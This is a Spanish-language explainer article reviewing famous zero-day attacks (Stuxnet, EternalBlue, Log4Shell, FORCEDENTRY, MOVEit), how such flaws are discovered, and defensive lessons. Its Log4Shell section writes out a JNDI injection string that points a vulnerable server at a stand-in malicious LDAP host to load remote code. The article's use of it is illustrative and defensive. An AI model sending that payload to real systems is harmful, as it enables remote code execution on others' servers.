Un ataque zero-day es una ofensiva contra una vulnerabilidad descubierta antes de que el fabricante sepa que existe — o antes de que publique un parche. Los ejemplos zero-day más conocidos han afectado a millones de dispositivos, han desestabilizado infraestructuras críticas y han costado miles de millones. Si alguna vez te has preguntado qué hace que un exploit famoso sea tan devastador, la respuesta está en el factor tiempo: el defensor tiene literalmente cero días para reaccionar. En este repaso por los zero-day reales más sonados, verás cómo se descubrieron, quién estaba detrás y qué lecciones dejaron para la industria.
Qué convierte un exploit en un zero-day (y por qué asusta tanto)
La diferencia entre un bug común y un ataque zero-day es la ventana de exposición. Un fallo conocido tiene parche, tiene firma en los antivirus, tiene reglas en los IDS. Un zero-day no tiene nada de eso. El atacante llega antes que todos.
El ciclo típico funciona así: un investigador (o un grupo con recursos estatales) encuentra un fallo en software ampliamente usado. Si lo reporta al fabricante, entramos en el circuito de divulgación responsable. Si lo explota en silencio, tenemos un zero-day activo — y nadie lo sabe hasta que alguien detecta comportamiento anómalo.
Los zero-days se venden en mercados grises. Según informes de Zerodium y similares, un exploit famoso para iOS puede superar los 2 millones de dólares. Para Android, en torno a 2,5 millones. El precio refleja la dificultad y el impacto potencial.
Los zero-day que cambiaron las reglas del juego
Stuxnet (2010) — CVE-2010-2568 y otros
Stuxnet no usó un solo zero-day. Usó cuatro. Este gusano, atribuido a una operación conjunta entre Estados Unidos e Israel (operación Olympic Games), atacó las centrifugadoras de enriquecimiento de uranio de la planta iraní de Natanz. Manipulaba los controladores Siemens S7-300 para que las centrifugadoras giraran a velocidades destructivas, mientras mostraba lecturas normales a los operadores.
Se descubrió casi por accidente: la empresa bielorrusa VirusBlokAda lo detectó en junio de 2010 al investigar equipos que se reiniciaban sin motivo. El análisis posterior reveló un nivel de sofisticación que la industria no había visto jamás. Si te interesa cómo el malware puede propagarse por USB, Stuxnet es el caso de estudio definitivo — así fue como saltó del mundo conectado al air-gapped.
EternalBlue (2017) — CVE-2017-0144
Desarrollado por la NSA y filtrado por el grupo Shadow Brokers en abril de 2017, EternalBlue explotaba una vulnerabilidad descubierta en el protocolo SMBv1 de Windows. Microsoft publicó el parche MS17-010 un mes antes de la filtración, pero millones de sistemas no se actualizaron.
El resultado: WannaCry (mayo 2017) y NotPetya (junio 2017). WannaCry cifró aproximadamente 200.000 equipos en 150 países en un fin de semana. El NHS británico quedó paralizado — un escenario similar al que hemos visto con los ataques de ransomware a hospitales. NotPetya, disfrazado de ransomware pero diseñado como arma destructiva contra Ucrania, causó pérdidas estimadas en más de 10.000 millones de dólares según la Casa Blanca.
Log4Shell (2021) — CVE-2021-44228
Un zero-day real con puntuación CVSS 10.0 (la máxima). La librería Log4j, usada por prácticamente todo el ecosistema Java, permitía ejecución remota de código con una simple cadena de texto en un campo de log. Bastaba con enviar ${jndi:ldap://servidor-malicioso/exploit} en un campo de usuario, un header HTTP o un mensaje de chat.
Lo reportó el equipo de seguridad de Alibaba Cloud en noviembre de 2021 a Apache. La magnitud era absurda: Minecraft, Steam, iCloud, Twitter, Amazon, Cloudflare... todos usaban Log4j. La Apache Software Foundation publicó el parche en diciembre, pero la superficie de ataque era tan amplia que CISA ordenó a todas las agencias federales de EE.UU. parchear antes de Navidad.
Pegasus / FORCEDENTRY (2021) — CVE-2021-30860
NSO Group, la empresa israelí detrás del spyware Pegasus, usó este exploit famoso para comprometer iPhones sin ninguna interacción del usuario (zero-click). El ataque explotaba un fallo en el procesamiento de imágenes PDF de iMessage. Citizen Lab, el laboratorio de la Universidad de Toronto, lo descubrió analizando el teléfono de un activista saudí en septiembre de 2021.
Apple parcheó con iOS 14.8 en tiempo récord. El análisis de Google Project Zero calificó el exploit como "uno de los más sofisticados técnicamente" que habían visto. Desde entonces, Apple introdujo el Modo de Aislamiento (Lockdown Mode) como contramedida extrema.
MOVEit Transfer (2023) — CVE-2023-34362
El grupo de ransomware Cl0p explotó una inyección SQL en el software de transferencia de archivos MOVEit, usado por miles de organizaciones — desde el Departamento de Energía de EE.UU. hasta la BBC y British Airways. Progress Software publicó el parche el 31 de mayo de 2023, pero Cl0p llevaba semanas extrayendo datos.
La campaña afectó a más de 2.500 organizaciones y expuso datos de aproximadamente 65 millones de personas, según estimaciones de Emsisoft.
Cómo se descubren los zero-day: las técnicas detrás del hallazgo
Nadie encuentra un ataque zero-day buscando "zero-day" en Google. Los métodos reales incluyen:
- Fuzzing automatizado: herramientas como AFL, LibFuzzer u OSS-Fuzz (de Google) bombardean software con entradas aleatorias hasta que algo se rompe. Google ha encontrado miles de bugs con este método.
- Análisis de tráfico anómalo: los equipos de threat intelligence de empresas como Mandiant, CrowdStrike o Kaspersky detectan patrones sospechosos en redes de clientes y los investigan hasta encontrar el exploit.
- Ingeniería inversa de parches: cuando un fabricante publica una actualización, los investigadores comparan la versión parcheada con la anterior (diff binario) para identificar qué se corrigió. A veces esto revela que el fallo ya estaba siendo explotado.
- Programas de bug bounty: Google, Microsoft, Apple y muchas otras pagan a investigadores por encontrar vulnerabilidades descubiertas antes que los atacantes. Google Project Zero lleva un registro público de todos los zero-days que detecta.
- Honeypots y sandboxes: plataformas como VirusTotal reciben muestras sospechosas a diario. Cuando algo nuevo aparece, la comunidad se activa.
Tabla: los zero-day más impactantes por década
| Año | Nombre / CVE | Software afectado | Descubierto por | Impacto estimado |
|---|---|---|---|---|
| 2010 | Stuxnet (múltiples CVE) | Windows / Siemens SCADA | VirusBlokAda | Infraestructura nuclear iraní |
| 2014 | Heartbleed (CVE-2014-0160) | OpenSSL | Codenomicon + Google | Aprox. 17% de servidores HTTPS |
| 2017 | EternalBlue (CVE-2017-0144) | Windows SMBv1 | NSA / Shadow Brokers | WannaCry + NotPetya: >10.000M $ |
| 2021 | Log4Shell (CVE-2021-44228) | Apache Log4j | Alibaba Cloud Security | Millones de aplicaciones Java |
| 2021 | FORCEDENTRY (CVE-2021-30860) | iOS iMessage | Citizen Lab | Espionaje a periodistas y activistas |
| 2023 | MOVEit (CVE-2023-34362) | MOVEit Transfer | Progress Software / Cl0p | 65M personas afectadas |
Lecciones que dejaron estos exploits
Cada zero-day real refuerza los mismos principios, que la industria sigue ignorando con frecuencia:
- Parchear rápido no es opcional. EternalBlue tenía parche un mes antes de WannaCry. Las organizaciones que lo aplicaron no sufrieron.
- La cadena de suministro de software es un vector crítico. Log4Shell demostró que una dependencia transitiva puede poner en jaque a medio internet. Herramientas como SBOM (Software Bill of Materials) ayudan a mapear qué usas y qué necesita actualización.
- La segmentación de red limita el daño. NotPetya se propagó lateralmente porque las redes internas eran planas. Un atacante que entra por un exploit famoso no debería poder moverse libremente hasta el controlador de dominio.
- Los dispositivos IoT amplían la superficie de ataque. Cuantos más dispositivos conectados tengas — desde cámaras hasta asistentes de voz — más puntos de entrada creas. Si te interesa este ángulo, el equipo de domótica lo cubre en detalle.
Para proteger un servidor propio, el hardening básico de Linux cubre los fundamentos: minimizar servicios, configurar firewalls y mantener las actualizaciones al día.
Preguntas frecuentes
¿Por qué se llaman ataques zero-day?
Porque el fabricante del software tiene cero días de margen desde que se conoce la vulnerabilidad hasta que se explota. No hay parche disponible en el momento del ataque, lo que deja a los defensores sin herramientas específicas para bloquearlo.
¿Pueden los antivirus detectar un zero-day?
Los antivirus basados en firmas, no — porque no existe firma para algo desconocido. Los sistemas con detección heurística o basada en comportamiento (EDR como CrowdStrike Falcon, SentinelOne o Microsoft Defender for Endpoint) tienen más posibilidades, pero no garantías. Un ataque zero-day bien diseñado evade la mayoría de controles iniciales.
¿Cuántos zero-days se descubren cada año?
Google Project Zero y Mandiant han documentado entre 60 y 100 vulnerabilidades descubiertas como zero-day explotadas activamente cada año desde 2021. La cifra real probablemente es mayor: muchos se usan durante meses o años antes de ser detectados.
¿Cómo puedo protegerme si no existe parche?
Aplica defensa en profundidad: segmenta redes, limita privilegios, monitoriza comportamiento anómalo, desactiva funcionalidades innecesarias (como SMBv1 en su momento) y mantén copias de seguridad offline. No puedes parchear lo que no tiene parche, pero puedes reducir la superficie de exposición.
El siguiente paso
Abre ahora mismo la lista de software que usas en tu organización — desde el sistema operativo hasta cada librería — y compárala con las bases de datos de vulnerabilidades de CVE Details o el catálogo de CISA. Si encuentras algo sin parchear, ya sabes por dónde empezar. Y si quieres saber cómo verificar si un enlace es seguro antes de hacer clic en algo sospechoso, empieza por ahí — porque muchos zero-day reales llegan disfrazados de un simple link.
